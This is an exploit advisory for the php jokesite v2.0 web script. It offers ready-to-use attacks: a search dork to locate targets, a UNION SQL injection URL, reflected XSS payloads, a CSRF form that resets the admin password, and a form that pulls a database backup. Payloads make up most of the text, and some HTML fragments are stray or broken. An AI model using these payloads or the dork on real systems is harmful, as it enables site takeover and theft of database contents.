facebook facebook twitter rss

php jokesite v2.0 Multiple Vulnerabilties

Author: AtT4CKxT3rR0r1ST , Published: 07-06-2012
php jokesite v2.0  Multiple Vulnerabilties
=======================================================================

#######################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://www.scriptdemo.com/
.:. Tested On Demo : http://www.scriptdemo.com/php-jokesite/ver2.0/
.:. Dork : inurl:"creat_postcard.php?img_id"
#######################################################################

===[ Exploit ]===


Sql Injection
==============

http://SITE/creat_postcard.php?img_id=null[sql]

http://SITE/creat_postcard.php?img_id=null'+and+1=2+union+select+1,2,3,version(),5,6,7,8,9,10,11-- -

Go To Page Source To Found Data Sql Injection


Multiple Reflected Xss
=======================


https://SITE/jokes_category.php?cat_id=40'"--></style></script><script>alert(1337)</script>
https://SITE/pictures_category.php?cat_id='"--></style></script><script>alert(1337)</script>


CSRF (Change Password Admin)
===============================

<form method="POST" name="form0" action="http://SITE/admin/admin_password.php">
<input type="hidden" name="todo" value="chpasswd"/>
<input type="hidden" name="adm_login" value="123456"/>
<input type="hidden" name="adm_passwd" value="123456"/>
<input type="hidden" name="adm_repasswd" value="123456"/>
<input type="hidden" name="update" value="Update"/>
</form>

</body>
</html>


Database Disclosure
===================

<html>
<head>
<title>Php Jokesite</title>

<form method="post" action="http://SITE/admin/admin_backup_db.php" name="backup">
<input type="hidden" name="todo" value="backup">
<table width="100%" cellspacing="0" cellpadding="1" border="0">

<tr>
<td bgcolor="#660099" align="center"><font face="Verdana, Arial" size="2" color="white"><b>Backup database</b></font></td>
</tr>
<tr>
<td bgcolor="#660099">
<TABLE border="0" cellpadding="4" cellspacing="0" bgcolor="#ffffef" width="100%">
<tr>
<td align="right"><font face="verdana" size="2" color="#FF0000"><b>Here you can backup your database.<br>We encourage you to make database backup's periodically, the loss will not be so big when something happen to the database.<br>A good option is to name your backup file in a format like this: mm-dd-yy-dbname.sql. This is automatically suggested by Internet Explorer, for other browsers you must introduce the filename.<br>Today suggested filename is : 06-06-2012-bitmix_bitmixjokev20.sql.<br>Also if you can store your backup files in the same directory, to be easy to find the files when you want to restore your database.</b></font></td>

</tr>
<tr>
<td align="right"><input type="submit" name="save" value="Backup"></td>
</tr>
</table>

</td></tr></table>
</form>
</td>

</td>
<td width="5">
&nbsp;

</td>
</tr>
</table>
</td>
</tr>
</table>

</td>
</tr>
</table>

</body>

</html>

#######################################################################

Like us on Facebook :